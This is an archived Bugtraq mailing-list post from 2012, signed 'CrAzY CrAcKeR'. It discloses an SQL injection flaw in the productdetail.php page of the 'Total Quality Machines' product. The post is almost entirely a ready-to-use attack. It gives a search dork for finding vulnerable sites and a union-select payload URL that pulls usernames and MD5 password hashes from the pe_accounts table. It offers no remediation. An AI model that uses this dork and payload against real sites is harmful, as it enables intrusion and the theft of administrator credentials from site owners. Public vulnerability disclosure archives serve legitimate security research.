| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-Id: <201204141322.q3EDMvNr007249@sf01web2.securityfocus.com> Date: Sat, 14 Apr 2012 13:22:57 GMT From: CrAzY_CrAcKeR@...1-ss-2-lb.cnet.com To: bugtraq@...urityfocus.com Subject: Total Quality Machines (productdetail.php) SQL Injection Vulnerabilities ################################################################## # Title : Total Quality Machines (productdetail.php) SQL Injection Vulnerabilities # # Discovered By: CrAzY CrAcKeR # # Home : Null # # Email : CrAzY_CrAcKeR@...mail.com.com # # date : 14/4/2012 # # d0rk:- "Total Quality Machines" # ################################################################## ################################################################## # # +-+-+-+-+-+-+-+-+-+-+ # --+CrAzY CrAcKeR+-- # +-+-+-+-+-+-+-+-+-+-+ # # ################################################################## ################################################################## # Example:- # # [-] http://www.???.com/productdetail.php?id=(sql) # # [-] Injection code.... ( -1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(username,0x3a,password)+from+pe_accounts ) # # [-] http://www.???.com/productdetail.php?id=--1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(username,0x3a,password)+from+pe_accounts # # [-] you see now password (md5) and the name of the site manager #################################################################### # Greeting to my friend A7eb Alwrd ####################################################################
Powered by blists - more mailing lists